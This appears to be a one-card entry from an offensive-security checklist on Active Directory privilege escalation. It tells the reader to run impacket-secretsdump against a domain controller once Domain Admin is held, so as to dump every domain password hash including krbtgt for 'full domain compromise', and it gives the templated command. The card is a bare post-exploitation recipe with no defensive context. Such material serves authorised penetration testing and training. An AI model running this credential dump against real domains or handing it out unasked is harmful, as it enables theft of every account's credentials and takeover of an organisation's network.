← Back to search

Run secretsdump when domain admin

ad privescwindowschecklist

Walkthrough

Once you have Domain Admin, run secretsdump against the DC to extract all domain hashes. A hit is the krbtgt hash and every account hash, enabling full domain compromise.

Commands

bash

impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<IP>